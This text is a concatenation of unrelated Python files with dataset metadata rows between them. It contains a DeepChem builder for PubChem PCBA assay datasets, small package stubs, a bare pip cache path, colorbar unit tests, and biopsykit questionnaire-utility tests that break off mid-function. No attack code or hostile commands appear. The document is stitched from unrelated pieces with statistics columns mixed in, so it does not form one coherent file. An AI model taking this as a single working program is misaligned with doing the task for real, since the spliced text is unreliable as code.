787,PCBA-721,PCBA-691,PCBA-679,PCBA-711,PCBA-1324,PCBA-1399,PCBA-1398,PCBA-1397,PCBA-1396,PCBA-1392,PCBA-1272,PCBA-1252,PCBA-1361,PCBA-1330,PCBA-1328,PCBA-1327,PCBA-1322,PCBA-1320,PCBA-1275,PCBA-927,PCBA-1288,PCBA-1284,PCBA-1279,PCBA-1278,PCBA-1277,PCBA-1250,PCBA-1249,PCBA-1225,PCBA-1223,PCBA-1221,PCBA-1200,PCBA-1198,PCBA-1197,PCBA-1196,PCBA-1000,PCBA-1134,PCBA-1068,PCBA-832,PCBA-820,PCBA-825,PCBA-724,PCBA-935,PCBA-830,PCBA-949,PCBA-826,PCBA-801,PCBA-737,PCBA-733,PCBA-715,PCBA-714,PCBA-713,PCBA-831,PCBA-523,PCBA-790,PCBA-1013,PCBA-718".split(
",")
def create_cid_list(self, assays_to_parse):
"""Find the union of all compounds tested across one or more assays
"""
assay_paths = list()
cid_list = np.array(list(), dtype=np.int64)
assay_no = 0
for path, dirs, filenames in os.walk(sdf_dir):
for dir in dirs:
# Each directory holds a range of assay results
joined_path = os.path.join(sdf_dir, dir)
for path, dirs, filenames in os.walk(joined_path):
for filename in filenames:
assay_name = "PCBA-" + filename.replace(".csv", "")
if assay_name not in assays_to_parse:
continue
file_path = os.path.join(joined_path, filename)
df = pd.read_csv(
file_path, usecols=["PUBCHEM_CID", "PUBCHEM_ACTIVITY_OUTCOME"])
df = df.dropna()
df["PUBCHEM_CID"] = df["PUBCHEM_CID"].astype(np.int64)
assay_paths.append(file_path)
cid_list = np.append(cid_list, df["PUBCHEM_CID"].as_matrix())
assay_no = assay_no + 1
if assay_no % 100 == 0:
print(
"Parsed: {0} of: {1}".format(assay_no, len(assays_to_parse)))
print("Convert to CID set")
cid_set = np.unique(cid_list)
return assay_paths, cid_set
def create_overview_146(self):
assay_list = self.pcba_146_assay_list
self.create_assay_file(assays_to_parse=assay_list, file_name="pcba_146.csv")
def create_overview_128(self):
assay_list = self.pcba_128_assay_list
self.create_assay_file(assays_to_parse=assay_list, file_name="pcba_128.csv")
def create_overview_for_gene(self, gene_symbol):
assays_url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/assay/target/genesymbol/{0}/aids/TXT".format(
gene_symbol)
r = requests.get(assays_url)
assays_to_parse = [
"PCBA-" + str(x) for x in r.text.split('\n') if len(x) > 0
]
file_name = "pcba_{0}.csv".format(gene_symbol)
self.create_assay_file(assays_to_parse=assays_to_parse, file_name=file_name)
def create_overview_2475(self):
'''
Reflects the results of query (1[TotalSidCount] : 1000000000[TotalSidCount] AND 5[ActiveSidCount] : 10000000000[ActiveSidCount] AND 0[TargetCount] : 1[TargetCount] AND "small molecule"[filt] AND "doseresponse"[filt] )
:return:
'''
assays_to_parse = self.pcba_2475_assay_list
self.create_assay_file(
assays_to_parse=assays_to_parse, file_name="pcba_2475.csv")
def create_assay_file(self, assays_to_parse, file_name):
cid_start = time.time()
assay_paths, cid_ref_list = self.create_cid_list(assays_to_parse)
cid_end = time.time()
print("CID length is: {0}, created in: {1} hours".format(
cid_ref_list.size, (cid_end - cid_start) / 3600))
print("Creating overview of {0} assays".format(len(assay_paths)))
path_final = os.path.join(data_dir, file_name)
assay_results = list()
assay_names = list()
cid_len = cid_ref_list.size
all_assay_start = time.time()
for assay_path in assay_paths:
assay_start = time.time()
filename = os.path.basename(assay_path)
assay_name = "PCBA-" + filename.replace(".csv", "")
print("Looking at: {0}".format(assay_name))
df = pd.read_csv(
assay_path, usecols=["PUBCHEM_CID", "PUBCHEM_ACTIVITY_OUTCOME"])
df = df.dropna(subset=["PUBCHEM_CID", "PUBCHEM_ACTIVITY_OUTCOME"])
if len(df.index) == 0:
continue
df["IS_ACTIVE"] = df["PUBCHEM_ACTIVITY_OUTCOME"] == "Active"
df = df.rename(columns={'IS_ACTIVE': assay_name})
df["PUBCHEM_CID"] = df["PUBCHEM_CID"].astype(int)
df[assay_name] = df[assay_name].astype(int)
df = df.set_index("PUBCHEM_CID")
df = df[~df.index.duplicated(keep='last')]
assay_results_array = array.array('i', (-1 for i in range(0, cid_len)))
print(assay_path)
for i in range(0, cid_len):
cid = cid_ref_list[i]
if cid in df.index:
val = df.get_value(cid, assay_name)
else:
# Just write NA
val = -1
assay_results_array[i] = val
assay_names.append(assay_name)
assay_results.append(assay_results_array)
assay_end = time.time()
print("Parsed: {0} in {1} seconds".format(assay_name, assay_end -
assay_start))
# Now, write out the results csv, going line by line through all molecule results
assay_results_len = len(assay_results)
all_assay_end = time.time()
print("Parsed all assays in: {} hours".format((
all_assay_end - all_assay_start) / 3600))
smiles_start = time.time()
print("Reading in smiles info")
with open(os.path.join(data_dir, "pubchemsmiles_tuple.pickle"), "rb") as f:
keys, values = pickle.load(f)
header_line = list()
header_line.append("mol_id")
header_line.append(",smiles")
for assay_name in assay_names:
header_line.append(",")
header_line.append(assay_name)
header_line_txt = "".join(header_line)
f_final = open(path_final, "w+")
f_final.write(header_line_txt + "\n")
for i in range(0, cid_len):
cid = cid_ref_list[i]
# printing the mol_id
line_for_comp = "CID" + str(cid)
# printing the SMILES
bisect_pos = bisect_left(keys, cid, 0)
cid_pos = bisect_pos if bisect_pos != len(
keys) and keys[bisect_pos] == cid else -1
if cid_pos == -1:
continue
line_for_comp += "," + str(values[cid_pos])
for j in range(0, assay_results_len):
val = assay_results[j][i]
if val == -1:
line_for_comp += ","
else:
line_for_comp += "," + str(val)
f_final.write(line_for_comp + "\n")
f_final.close()
# Now gzip it
with open(path_final, 'rb') as f_in:
with gzip.open(path_final + ".gz", 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
# Now remove the intermediate csv
os.remove(path_final)
smiles_end = time.time()
print("Smiles joined and gzip in: {} hours".format((
smiles_end - smiles_start) / 3600))
print("Finished creating dataset: {} in: {} hours".format(
file_name, (smiles_end - all_assay_start) / 3600))
parser = argparse.ArgumentParser(
description='Deepchem dataset builder for PCBA datasets')
parser.add_argument(
'-d',
action='store',
dest='dataset_name',
default="",
help='Choice of dataset: pcba_128, pcba_146, pcba_2475')
parser.add_argument(
'-g',
action='store',
dest='gene_arg',
default=None,
help='Name of gene to create a dataset for')
args = parser.parse_args()
pcba_builder = PCBADatsetBuilder()
if args.dataset_name == "pcba_128":
pcba_builder.create_overview_128()
elif args.dataset_name == "pcba_146":
pcba_builder.create_overview_146()
elif args.dataset_name == "pcba_2475":
pcba_builder.create_overview_2475()
elif args.gene_arg is not None:
pcba_builder.create_overview_for_gene(args.gene_arg)
else:
parser.print_help()
| 165.758475 | 28,590 | 0.792019 | 6,572 | 39,119 | 4.669507 | 0.409464 | 0.003389 | 0.005507 | 0.002477 | 0.107795 | 0.097465 | 0.093685 | 0.089318 | 0.089318 | 0.089025 | 0 | 0.40736 | 0.044147 | 39,119 | 235 | 28,591 | 166.46383 | 0.41335 | 0.013318 | 0 | 0.11236 | 0 | 0.022472 | 0.842378 | 0.821998 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039326 | false | 0 | 0.067416 | 0 | 0.117978 | 0.067416 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2254485472220f33709f12dca9182d9d2303d36f | 132 | py | Python | LED2Net/Dataset/__init__.py | zhigangjiang/LED2-Net | 28528b2180d6af0caee54a60560b88dd0f218f1b | [
"MIT"
] | 57 | 2021-03-25T05:42:34.000Z | 2022-03-30T02:50:30.000Z | LED2Net/Dataset/__init__.py | zhigangjiang/LED2-Net | 28528b2180d6af0caee54a60560b88dd0f218f1b | [
"MIT"
] | 8 | 2021-04-09T09:50:22.000Z | 2022-02-17T17:36:27.000Z | LED2Net/Dataset/__init__.py | zhigangjiang/LED2-Net | 28528b2180d6af0caee54a60560b88dd0f218f1b | [
"MIT"
] | 6 | 2021-04-11T10:15:07.000Z | 2022-03-31T06:56:56.000Z | from .Realtor360Dataset import Realtor360Dataset
from .Matterport3DDataset import Matterport3DDataset
from . import SharedFunctions
| 33 | 52 | 0.886364 | 11 | 132 | 10.636364 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 0.090909 | 132 | 3 | 53 | 44 | 0.908333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
225c9fcd44ed48dc24111cd245f1b771b3ec57d7 | 96 | py | Python | venv/lib/python3.8/site-packages/jedi/inference/compiled/subprocess/__main__.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/jedi/inference/compiled/subprocess/__main__.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/jedi/inference/compiled/subprocess/__main__.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/1f/9a/ca/88e83a632cb32564101ec3065edd7c149b85d858df19fcc5ca504e774b | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.40625 | 0 | 96 | 1 | 96 | 96 | 0.489583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3f152e345df66497aff0d8c0d768b84bf28c0d4e | 38 | py | Python | illuminate_core/service/__init__.py | tonyhhyip/py-illuminate | 173162c8b6e5a49472515142d5446fae543ff7b4 | [
"MIT"
] | null | null | null | illuminate_core/service/__init__.py | tonyhhyip/py-illuminate | 173162c8b6e5a49472515142d5446fae543ff7b4 | [
"MIT"
] | null | null | null | illuminate_core/service/__init__.py | tonyhhyip/py-illuminate | 173162c8b6e5a49472515142d5446fae543ff7b4 | [
"MIT"
] | null | null | null | from .provider import ServiceProvider
| 19 | 37 | 0.868421 | 4 | 38 | 8.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.970588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3f1935aa2418dce87ea3e15daf0e28cdc92dcbd6 | 83 | py | Python | shenmeGUI/helpers.py | tigerjang/ShenMeGUI | 55f30a2525a946b7b40fb3f17538b1f4f18c9fcc | [
"MIT"
] | 1 | 2016-09-22T03:12:38.000Z | 2016-09-22T03:12:38.000Z | shenmeGUI/helpers.py | tigerjang/ShenMeGUI | 55f30a2525a946b7b40fb3f17538b1f4f18c9fcc | [
"MIT"
] | null | null | null | shenmeGUI/helpers.py | tigerjang/ShenMeGUI | 55f30a2525a946b7b40fb3f17538b1f4f18c9fcc | [
"MIT"
] | null | null | null |
def is_string(obj):
return isinstance(obj, str) or isinstance(obj, unicode)
| 13.833333 | 59 | 0.710843 | 12 | 83 | 4.833333 | 0.75 | 0.448276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180723 | 83 | 5 | 60 | 16.6 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
3f1c38d9f2f3a3e45225b1d714bf0dc9f19de58b | 3,161 | py | Python | ImagePlotter_test.py | shmouses/SpectrumImageAnalysisPy | 4374e604fb7b493ba84b9675041015b87084e07f | [
"BSD-3-Clause"
] | 3 | 2019-07-09T21:14:59.000Z | 2020-09-03T02:24:03.000Z | ImagePlotter_test.py | shmouses/SpectrumImageAnalysisPy | 4374e604fb7b493ba84b9675041015b87084e07f | [
"BSD-3-Clause"
] | 38 | 2017-09-15T15:24:03.000Z | 2021-01-07T22:38:14.000Z | ImagePlotter_test.py | icbicket/SpectrumImageAnalysisPy | 4374e604fb7b493ba84b9675041015b87084e07f | [
"BSD-3-Clause"
] | 9 | 2017-09-15T02:40:32.000Z | 2022-03-10T00:03:26.000Z | import ImagePlotter
import unittest
class cbarextensionfinder(unittest.TestCase):
def testclimequalimglim(self):
'''
What happens if the colour limits are equal to the image limits?
'''
clim = [0, 10]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('neither', cbar_extend)
def testclimsmallbottom(self):
'''
What happens if the minimum of the colour limit is smaller than the
minimum of the image limit, but the max of both are the same?
'''
clim = [5, 10]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('min', cbar_extend)
def testclimsmalltop(self):
'''
If the minimum of the colour limit is the same as the minimum of the
image limit, but the maximums of the colour limit is smaller than the
maximum of the image limit.
'''
clim = [0, 4]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('max', cbar_extend)
def testclimsmalltopbottom(self):
'''
If the minimum of the colour limit is greater than the minimum of the
image limit and the maximum of the colour limit is less than the
maximum of the image limit
'''
clim = [4, 7]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('both', cbar_extend)
def testclimbigtopbottom(self):
'''
If the minimum of the colour limit is less than the minimum of the
image limit and the maximum of the colour limit is greater than the
maximum of the image limit.
'''
clim = [-1, 12]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('neither', cbar_extend)
def testclimbigtop(self):
'''
If the minimum of the colour limit is the same as the minimum of the
image limit and the maximum of the colour limit is greater than the
maximum of the image limit
'''
clim = [0, 12]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('neither', cbar_extend)
def testclimbigbottom(self):
'''
If the minimum of the colour limit is less than the minimum of the
image limit and the maxima are the same.
'''
clim = [-2, 10]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('neither', cbar_extend)
def testclimbigbottomsmalltop(self):
'''
If the minimum of the colour limit is smaller than the minimum of the
image limit and the maximum of the colour limit is smaller than the
maximum of the image limit
'''
clim = [-2, 8]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('max', cbar_extend)
def testclimsmallbottombigtop(self):
'''
If the minimum of the colour limit is greater than the minimum of the
image limit and the maximum of the colour limit is greater than the
maximum of the image limit.
'''
clim = [2, 12]
imglim = [0, 10]
cbar_extend = ImagePlotter.cbarextensionfinder(clim, imglim)
self.assertEqual('min', cbar_extend)
if __name__ == '__main__':
unittest.main()
| 30.990196 | 72 | 0.714015 | 447 | 3,161 | 4.991051 | 0.138702 | 0.062752 | 0.08606 | 0.107575 | 0.823846 | 0.808158 | 0.808158 | 0.808158 | 0.786195 | 0.782609 | 0 | 0.020142 | 0.198988 | 3,161 | 101 | 73 | 31.29703 | 0.860979 | 0.411262 | 0 | 0.52 | 0 | 0 | 0.03004 | 0 | 0 | 0 | 0 | 0 | 0.18 | 1 | 0.18 | false | 0 | 0.04 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3f2e76cdb8ad70f2e6f6a390102e03d40cd334b9 | 41,492 | py | Python | tests/test_questionnaires/test_questionnaires_utils.py | Zwitscherle/BioPsyKit | 7200c5f1be75c20f53e1eb4c991aca1c89e3dd88 | [
"MIT"
] | 10 | 2020-11-05T13:34:55.000Z | 2022-03-11T16:20:10.000Z | tests/test_questionnaires/test_questionnaires_utils.py | Zwitscherle/BioPsyKit | 7200c5f1be75c20f53e1eb4c991aca1c89e3dd88 | [
"MIT"
] | 14 | 2021-03-11T14:43:52.000Z | 2022-03-10T19:44:57.000Z | tests/test_questionnaires/test_questionnaires_utils.py | Zwitscherle/BioPsyKit | 7200c5f1be75c20f53e1eb4c991aca1c89e3dd88 | [
"MIT"
] | 3 | 2021-09-13T13:14:38.000Z | 2022-02-19T09:13:25.000Z | from contextlib import contextmanager
from itertools import product
from pathlib import Path
from typing import Optional
from unittest import TestCase
import numpy as np
import pandas as pd
import pytest
from numpy.testing import assert_array_equal
from pandas._testing import assert_frame_equal, assert_series_equal
from biopsykit.questionnaires.utils import (
bin_scale,
compute_scores,
convert_scale,
crop_scale,
find_cols,
get_supported_questionnaires,
invert,
to_idx,
wide_to_long,
zero_pad_columns,
)
from biopsykit.utils.exceptions import ValidationError, ValueRangeError
TEST_FILE_PATH = Path(__file__).parent.joinpath("../test_data/questionnaires")
@contextmanager
def does_not_raise():
yield
def data_complete_correct() -> pd.DataFrame:
data = pd.read_csv(TEST_FILE_PATH.joinpath("questionnaire_correct.csv"))
data = data.set_index(["subject", "condition"])
return data
def data_pre_post() -> pd.DataFrame:
data = pd.read_csv(TEST_FILE_PATH.joinpath("questionnaire_pre_post.csv"))
data = data.set_index(["subject", "condition"])
return data
def data_results_compute_scores() -> pd.DataFrame:
data = pd.read_csv(TEST_FILE_PATH.joinpath("questionnaire_results_compute_scores.csv"))
data = data.set_index(["subject", "condition"])
return data
def data_compute_scores() -> pd.DataFrame:
data = pd.read_csv(TEST_FILE_PATH.joinpath("questionnaire_compute_scores.csv"))
data = data.set_index(["subject", "condition"])
return data
class TestQuestionnairesUtils:
@pytest.mark.parametrize(
"data, expected",
[(pd.Series(dtype="float64"), pytest.raises(ValidationError)), (pd.DataFrame(), does_not_raise())],
)
def test_find_cols_raise(self, data, expected):
with expected:
find_cols(data)
@pytest.mark.parametrize(
"data, regex_str, starts_with, ends_with, contains, zero_pad_numbers, expected",
[
(
data_complete_correct(),
None,
"ADSL",
None,
None,
False,
["ADSL_{}".format(i) for i in range(1, 21)],
),
(
data_complete_correct(),
None,
"ADSL",
None,
None,
True,
["ADSL_{:02d}".format(i) for i in range(1, 21)],
),
(
data_complete_correct(),
r"ADSL_(\d+)",
None,
None,
None,
True,
["ADSL_{:02d}".format(i) for i in range(1, 21)],
),
(
data_complete_correct(),
None,
"FEE",
None,
None,
True,
["FEE_{}_{}".format(i, j) for i, j in product(range(1, 25), ["Mutter", "Vater"])],
),
(
data_complete_correct(),
None,
"FEE",
"Vater",
None,
True,
["FEE_{}_Vater".format(i) for i in range(1, 25)],
),
(
data_complete_correct(),
r"FEE_(\d+)_Mutter",
None,
None,
None,
True,
["FEE_{}_Mutter".format(i) for i in range(1, 25)],
),
(
data_complete_correct(),
r"FEE_(\d+)_Mutter",
None,
"Vater",
None,
True,
["FEE_{}_Mutter".format(i) for i in range(1, 25)],
),
(
data_complete_correct(),
None,
"FEE",
"Vater",
"COPE",
True,
[],
),
(
data_complete_correct(),
None,
None,
None,
"COPE",
True,
["Brief_COPE_{:02d}".format(i) for i in range(1, 29)],
),
(
data_complete_correct(),
None,
None,
None,
"COPE",
False,
["Brief_COPE_{}".format(i) for i in range(1, 29)],
),
],
)
def test_find_cols(self, data, regex_str, starts_with, ends_with, contains, zero_pad_numbers, expected):
data_out, cols = find_cols(
data=data,
regex_str=regex_str,
starts_with=starts_with,
ends_with=ends_with,
contains=contains,
zero_pad_numbers=zero_pad_numbers,
)
TestCase().assertListEqual(list(cols), expected)
TestCase().assertListEqual(list(data_out.columns), expected)
@pytest.mark.parametrize(
"data, inplace, expected_in, expected_out",
[
(
pd.DataFrame(columns=["ABC_1", "ABC_2", "ABC_3"]),
False,
pd.DataFrame(columns=["ABC_1", "ABC_2", "ABC_3"]),
pd.DataFrame(columns=["ABC_01", "ABC_02", "ABC_03"]),
),
(
pd.DataFrame(columns=["ABC_1", "ABC_2", "ABC_3"]),
True,
pd.DataFrame(columns=["ABC_01", "ABC_02", "ABC_03"]),
None,
),
],
)
def test_zero_pad_columns_inplace(self, data, inplace, expected_in, expected_out):
out = zero_pad_columns(data=data, inplace=inplace)
assert_frame_equal(data, expected_in)
if expected_out is not None:
assert_frame_equal(out, expected_out)
@pytest.mark.parametrize(
"col_idxs, expected",
[
([1, 2, 3, 4], np.array([0, 1, 2, 3])),
(np.array([1, 2, 3, 4]), np.array([0, 1, 2, 3])),
],
)
def test_to_idx(self, col_idxs, expected):
out = to_idx(col_idxs=col_idxs)
assert_array_equal(out, expected)
@pytest.mark.parametrize(
"data, score_range, cols, expected",
[
(np.array([[1, 2], [3, 4], [5, 6]]), [1, 0], None, pytest.raises(ValidationError)),
(pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}), [1, 2, 3], None, pytest.raises(ValidationError)),
(pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}), [1, 3], None, does_not_raise()),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], None, pytest.raises(ValueRangeError)),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], ["A"], pytest.raises(ValueRangeError)),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], ["A", "B"], pytest.raises(ValueRangeError)),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], ["B"], does_not_raise()),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], ["B", "C"], does_not_raise()),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], [0], pytest.raises(ValueRangeError)),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], [0, 1], pytest.raises(ValueRangeError)),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], [1], does_not_raise()),
(pd.DataFrame({"A": [1, 4], "B": [2, 3], "C": [1, 3]}), [1, 3], [1, 2], does_not_raise()),
(pd.Series([1, 2, 1, 2, 3]), [1, 3], [1, 2], does_not_raise()),
(pd.Series([1, 2, 1, 2, 3]), [1, 3], None, does_not_raise()),
(pd.Series([1, 2, 1, 4, 3]), [1, 3], None, pytest.raises(ValueRangeError)),
],
)
def test_invert_raises(self, data, score_range, cols, expected):
with expected:
invert(data=data, score_range=score_range, cols=cols)
@pytest.mark.parametrize(
"data, score_range, cols, inplace, expected_in, expected_out",
[
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
[1, 3],
None,
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [3, 2], "B": [2, 1], "C": [3, 1]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
[1, 3],
None,
True,
pd.DataFrame({"A": [3, 2], "B": [2, 1], "C": [3, 1]}),
None,
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 5]}),
[0, 5],
None,
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 5]}),
pd.DataFrame({"A": [4, 3], "B": [3, 2], "C": [4, 0]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 5]}),
[0, 5],
None,
True,
pd.DataFrame({"A": [4, 3], "B": [3, 2], "C": [4, 0]}),
None,
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
[1, 3],
["A", "B"],
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [3, 2], "B": [2, 1], "C": [1, 3]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
[1, 3],
[0, 1],
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [3, 2], "B": [2, 1], "C": [1, 3]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
[1, 3],
["A"],
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [3, 2], "B": [2, 3], "C": [1, 3]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
[1, 3],
["A"],
True,
pd.DataFrame({"A": [3, 2], "B": [2, 3], "C": [1, 3]}),
None,
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
[1, 3],
[1, 2],
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [1, 2], "B": [2, 1], "C": [3, 1]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
[1, 3],
[1, 2],
True,
pd.DataFrame({"A": [1, 2], "B": [2, 1], "C": [3, 1]}),
None,
),
],
)
def test_invert(self, data, score_range, cols, inplace, expected_in, expected_out):
out = invert(data=data, score_range=score_range, cols=cols, inplace=inplace)
assert_frame_equal(data, expected_in)
if expected_out is not None:
assert_frame_equal(out, expected_out)
@pytest.mark.parametrize(
"data, score_range, cols, inplace, expected_in, expected_out",
[
(
pd.Series([1, 2, 3, 2, 2, 1]),
[1, 3],
None,
False,
pd.Series([1, 2, 3, 2, 2, 1]),
pd.Series([3, 2, 1, 2, 2, 3]),
),
(
pd.Series([1, 2, 3, 2, 2, 1]),
[1, 3],
None,
True,
pd.Series([3, 2, 1, 2, 2, 3]),
None,
),
(
pd.Series([1, 2, 3, 2, 2, 1]),
[1, 3],
["A"],
False,
pd.Series([1, 2, 3, 2, 2, 1]),
pd.Series([3, 2, 1, 2, 2, 3]),
),
],
)
def test_invert_series(self, data, score_range, cols, inplace, expected_in, expected_out):
out = invert(data=data, score_range=score_range, cols=cols, inplace=inplace)
assert_series_equal(data, expected_in)
if expected_out is not None:
assert_series_equal(out, expected_out)
@pytest.mark.parametrize(
"data, offset, cols, inplace, expected_in, expected_out",
[
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
-1,
None,
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [0, 1], "B": [1, 2], "C": [0, 2]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
4,
None,
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [5, 6], "B": [6, 7], "C": [5, 7]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
-1,
None,
True,
pd.DataFrame({"A": [0, 1], "B": [1, 2], "C": [0, 2]}),
None,
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
-1,
["A"],
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [0, 1], "B": [2, 3], "C": [1, 3]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
-1,
["A"],
True,
pd.DataFrame({"A": [0, 1], "B": [2, 3], "C": [1, 3]}),
None,
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
-1,
[0],
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [0, 1], "B": [2, 3], "C": [1, 3]}),
),
(
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
-1,
[1, 2],
False,
pd.DataFrame({"A": [1, 2], "B": [2, 3], "C": [1, 3]}),
pd.DataFrame({"A": [1, 2], "B": [1, 2], "C": [0, 2]}),
),
],
)
def test_convert_scale(self, data, offset, cols, inplace, expected_in, expected_out):
out = convert_scale(data=data, offset=offset, cols=cols, inplace=inplace)
assert_frame_equal(data, expected_in)
if expected_out is not None:
